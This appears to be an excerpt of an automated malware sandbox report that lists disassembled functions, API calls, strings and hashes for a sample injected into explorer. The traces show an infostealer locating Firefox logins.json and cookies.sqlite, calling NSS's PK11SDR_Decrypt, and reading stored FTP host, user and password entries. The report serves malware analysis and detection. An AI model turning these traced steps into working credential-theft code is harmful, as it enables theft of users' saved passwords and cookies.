                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                      • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                      • String ID:
                                                      • API String ID: 1066184869-0
                                                      • Opcode ID: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                      • Instruction ID: 37da3b80879da37bc67d4af4f669a1a9ad8ecdb0f523aff93c9fd86c8ed134e7
                                                      • Opcode Fuzzy Hash: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                      • Instruction Fuzzy Hash: 09018631204254ABC7159F21DC05EEF7FA9EFCA390F10442DF85992153DE758985EBA1
                                                      Function 000C4B72 Relevance: 4.5, APIs: 3, Instructions: 8comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ExitInitializeProcessUninitialize
                                                      • String ID:
                                                      • API String ID: 4175140541-0
                                                      • Opcode ID: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                      • Instruction ID: e31af23fe5809eada00f867ee4f4d181e9e93fedf537769018753eb4e94eddb2
                                                      • Opcode Fuzzy Hash: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                      • Instruction Fuzzy Hash: 5DC04C302851005BE6842BE05E1DB8D3598BB00712F008004F205854A1DB6244808622
                                                      Function 000C9FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 000C9FF8
                                                      Strings
                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 000CA00E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                      • API String ID: 10892065-982776804
                                                      • Opcode ID: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                      • Instruction ID: e715bdd9b239edc05242f7aebd258c497018237035b896384139ad43ec015729
                                                      • Opcode Fuzzy Hash: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                      • Instruction Fuzzy Hash: 1BF0F672704345BAE7305B94AC8CF6F67DCD795789F20043DF945D3240E2706C428631
                                                      Function 000C1AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 000C1B40
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                      • API String ID: 2162223993-2036018995
                                                      • Opcode ID: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                      • Instruction ID: ba6ff228695c27fa0e95587fa3488995e2f62e52786e8c68b30e74e3f32379bf
                                                      • Opcode Fuzzy Hash: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                      • Instruction Fuzzy Hash: 7CF0B43670064827D615AB2ACC84FEF768ECBD33A6316002DF41993243EF23AC915668
                                                      Function 000C9EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(02730000,00000000,?), ref: 000C9EB5
                                                      Strings
                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 000C9ECD
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                      • API String ID: 1279760036-667713680
                                                      • Opcode ID: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                      • Instruction ID: 75b594978964026cbc1719c2babe4ecb5b8b57bcb69ff72efe4b527b1532c5f2
                                                      • Opcode Fuzzy Hash: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                      • Instruction Fuzzy Hash: 1AE0CD376041107BC12257446C05F5F7764DBA4F10F010019F90453651C3309C5287A1
                                                      Function 000C1B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateFileHandle
                                                      • String ID:
                                                      • API String ID: 3498533004-0
                                                      • Opcode ID: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                      • Instruction ID: 54c4544992f8f1923c99968fc4dc665176b3479511f2df21b352beb30d5b6e3c
                                                      • Opcode Fuzzy Hash: fb83b2a1d5a581adf8663e9681af5fe925a263dbb17b22ca4c3dc420efa1d5a3
                                                      • Instruction Fuzzy Hash: E8D0C771203230A2E5B923353D0CFEB2E6CDF03AB1F054618B60CD44D0E3218D8386E0
                                                      Function 000C9EE8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapFree.KERNEL32(02730000,00000000,?), ref: 000C9EF8
                                                      Strings
                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 000C9F0E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                      • API String ID: 3298025750-4030396798
                                                      • Opcode ID: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                      • Instruction ID: f2441149ca70ee939b8fe1d96a8109030f2138eee9c13a8f6c809ff235a10f20
                                                      • Opcode Fuzzy Hash: e6cf1ab3cadd53c12baf4be0df7fa84b55b2fd0425e933efba08a857e19a390b
                                                      • Instruction Fuzzy Hash: CFD01276508241BBD6119B54AC45F2F77B9ABA5B00F44042CF104964A6D37554A3AB71
                                                      Function 000C12A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryZero
                                                      • String ID:
                                                      • API String ID: 816449071-0
                                                      • Opcode ID: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                      • Instruction ID: 7d68ba4ea28ba266cf2c5d120ee712bc90d8f352e3f6c553bbf1d70295c067c7
                                                      • Opcode Fuzzy Hash: 86b6d5fe5fb10f6ab2bd76b1a30088a970d9e36d2d68ea2653425e6a49665cd2
                                                      • Instruction Fuzzy Hash: 7511E3B5A01209AFDB24DFA9E984EEEB7FCEB49341B104029F945E6241D7319A40CB60
                                                      Function 000C1677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C1684
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateGlobalStream
                                                      • String ID:
                                                      • API String ID: 2244384528-0
                                                      • Opcode ID: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                      • Instruction ID: 05cf46aa160d6539f5a83fde185778d3e14ae09a92089202867549f6638f93f9
                                                      • Opcode Fuzzy Hash: 01aba32b51baa4027fc70d4f0020f550da9d05b624074335d5003e592ed6c4e6
                                                      • Instruction Fuzzy Hash: DAC012301202219EE7601B209D09BCA36D8AF1A7A2F060929A081990C0E2F508C08A90
                                                      Function 000C104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,000C158A), ref: 000C1056
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                      • Instruction ID: 6ced8ba81a80a37abd1a230f096ca294a1d38799ad107e7e8dc3420ce8496934
                                                      • Opcode Fuzzy Hash: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
                                                      • Instruction Fuzzy Hash: 61A002F07D67007AFD6D5762AF1FF5529389744F02F114244B34D7C4D095E97540852D
                                                      Function 000C105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,000C4A5B,?,?,00000000,?,?,?,?,000C4B66,?), ref: 000C1065
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                      • Instruction ID: ea9c58852240352b8423ea4b75abe92339e5d7fb28c36c6259098a70c275598b
                                                      • Opcode Fuzzy Hash: a0841d3495debf9561b2fd3655bc4f405786c16b4d3aa47c1d731820491bf4e9
                                                      • Instruction Fuzzy Hash: F4A0027069070076EDB857205E0AF4526146780B01F2185447641A94D18AA6E084CA18

                                                      Non-executed Functions

                                                      Function 000C349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C34C0
                                                        • Part of subcall function 000C33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 000C3401
                                                      • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000C37A8), ref: 000C34E9
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C351E
                                                      • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 000C3541
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 000C3586
                                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 000C358F
                                                      • lstrcmpiW.KERNEL32(00000000,File), ref: 000C35B6
                                                      • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000C35DE
                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C35F6
                                                      • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000C3606
                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 000C361E
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 000C3631
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 000C3658
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 000C366B
                                                      • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 000C3681
                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000C36AD
                                                      • CloseHandle.KERNEL32(?), ref: 000C36C0
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C36F5
                                                        • Part of subcall function 000C1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 000C1CC0
                                                        • Part of subcall function 000C1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000C1CDA
                                                        • Part of subcall function 000C1C9F: CloseHandle.KERNEL32(00000000), ref: 000C1CE6
                                                      • CloseHandle.KERNEL32(?), ref: 000C3707
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                      • String ID: File
                                                      • API String ID: 3915112439-749574446
                                                      • Opcode ID: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                      • Instruction ID: e611380c84b8e800ad77419bd56dca3311fb691ad2757330bb5d87bb6a9d9bac
                                                      • Opcode Fuzzy Hash: 85c91e519d110048cb2d754a10ec55df9a05838f1dba24dbab689c051b21d81c
                                                      • Instruction Fuzzy Hash: 30619370214300BFD7649F20CC85FAFBBE9EB88754F10892CF946D62A2D776DA848B51
                                                      Function 00114438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcmp.NTDLL ref: 00114502
                                                      • memcmp.NTDLL ref: 0011475F
                                                      • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00114803
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcmp$memcpy
                                                      • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                      • API String ID: 231171946-1096842476
                                                      • Opcode ID: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                      • Instruction ID: 0ae4a5864ec2897dd920d3a381ff2996a0ff21590144861ef0922d2565c29d7a
                                                      • Opcode Fuzzy Hash: b4768a15e99ee3ef54f00a1cf1c222636a9990fab00678141a19e80a01d1a023
                                                      • Instruction Fuzzy Hash: 18C1E4719083519BDB3CCF188490BFAB7D2AB9AB18F14053EF4D587292D724D8C5C796
                                                      Function 000C2B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 000C2B3D
                                                      • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C2B63
                                                      • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C2B7B
                                                        • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                      • StrStrIW.SHLWAPI(00000000,logins.json), ref: 000C2BE7
                                                      • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 000C2C16
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000C2C43
                                                      • FindClose.KERNEL32(00000000), ref: 000C2C52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                      • String ID: \*.*$cookies.sqlite$logins.json
                                                      • API String ID: 1108783765-3717368146
                                                      • Opcode ID: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                      • Instruction ID: aafc04bb5f71a56d0c688c2381e3aaf9193852b0c09fd3335d0131dcf12101ad
                                                      • Opcode Fuzzy Hash: 816a57068c54ca00ef35ce7b1a04263d4aa104917f7177b53de6423b35f69afa
                                                      • Instruction Fuzzy Hash: 283190303043055BCB18AB709995FFE73DAAB89700B14893CB845D3693EF7ACD869252
                                                      Function 000E5F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C6AAA: memset.NTDLL ref: 000C6AC5
                                                      • memset.NTDLL ref: 000E5F53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                      • API String ID: 2221118986-594550510
                                                      • Opcode ID: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                      • Instruction ID: 5d15dc0e707e90713246ede4f2e4703f2becd81512558dd9c05cf51217637031
                                                      • Opcode Fuzzy Hash: 653fe322f454fb9f1dd5fa54b1c4e25b63d7f4155551440a66e3479997b0d3dc
                                                      • Instruction Fuzzy Hash: 7DC1AD706087429FCB54DF26D480A6FB7E2BFD8740F04892DF855A7242DB32E956CB92
                                                      Function 000C2112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 000C2127
                                                      • _alldiv.NTDLL(?,?,00989680,00000000), ref: 000C213A
                                                      • wsprintfA.USER32 ref: 000C214F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                      • String ID: %li
                                                      • API String ID: 4120667308-1021419598
                                                      • Opcode ID: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                      • Instruction ID: 87b622b6f1c7054b961d268ef61acbadafc26ef617cff2d966bd51cf342a7809
                                                      • Opcode Fuzzy Hash: ca47e084cee357e27e5a0275cf18bf47dd6c277cb9b9ed8cc12eaad378895f9b
                                                      • Instruction Fuzzy Hash: 22E0D83264121877C7243BB89D06FEF7B6DDB80B55F004195F900E2586E6738AA483D5
                                                      Function 000C4440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(001162B0,00000000,00000001,001162A0,?), ref: 000C445F
                                                      • SysAllocString.OLEAUT32(?), ref: 000C44AA
                                                      • lstrcmpiW.KERNEL32(RecentServers,?), ref: 000C456E
                                                      • lstrcmpiW.KERNEL32(Servers,?), ref: 000C457D
                                                      • lstrcmpiW.KERNEL32(Settings,?), ref: 000C458C
                                                        • Part of subcall function 000C11E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000C46E3), ref: 000C11ED
                                                        • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C120F
                                                        • Part of subcall function 000C11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1231
                                                      • lstrcmpiW.KERNEL32(Server,?), ref: 000C45BE
                                                      • lstrcmpiW.KERNEL32(LastServer,?), ref: 000C45CD
                                                      • lstrcmpiW.KERNEL32(Host,?), ref: 000C4657
                                                      • lstrcmpiW.KERNEL32(Port,?), ref: 000C4679
                                                      • lstrcmpiW.KERNEL32(User,?), ref: 000C469F
                                                      • lstrcmpiW.KERNEL32(Pass,?), ref: 000C46C5
                                                      • wsprintfW.USER32 ref: 000C471E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                      • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                      • API String ID: 2230072276-1234691226
                                                      • Opcode ID: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                      • Instruction ID: e843122c189cc5930bf12067dc9b5f1d3e7ad64f530fa00f5a5b4f521c672ced
                                                      • Opcode Fuzzy Hash: 30888a708acc5a0ea93051fd38392112b84266cdb92fea4b5db642ddf6ce8d0b
                                                      • Instruction Fuzzy Hash: 1BB1F571208302AFD744DF64C894F6AB7E9BF89745F00896CF5858B261DB72E846CB62
                                                      Function 000C24B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • Part of subcall function 000C1090: lstrlenW.KERNEL32(?,?,00000000,000C17E5), ref: 000C1097
                                                        • Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000C10A8
                                                        • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 000C2503
                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 000C250A
                                                      • LoadLibraryW.KERNEL32(00000000), ref: 000C2563
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2570
                                                      • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 000C2591
                                                      • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 000C259E
                                                      • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000C25AB
                                                      • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000C25B8
                                                      • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000C25C5
                                                      • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C25D2
                                                      • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000C25DF
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                      • API String ID: 3366569387-3272982511
                                                      • Opcode ID: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                      • Instruction ID: f27eb7f9fdc0b117fc65d383f015153ce6af75afbe9925de09a55da9ba8c9da4
                                                      • Opcode Fuzzy Hash: c1b70d19bbb5fc11e2944ac74cd44553f1d1393c64af99f6848bdd0e200f2215
                                                      • Instruction Fuzzy Hash: A3414835A00315ABCB28EF349D54FEE7AE59B96740B10003EF851D3AA3DB758C878B61
                                                      Function 000C5E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C5BF5: memset.NTDLL ref: 000C5C07
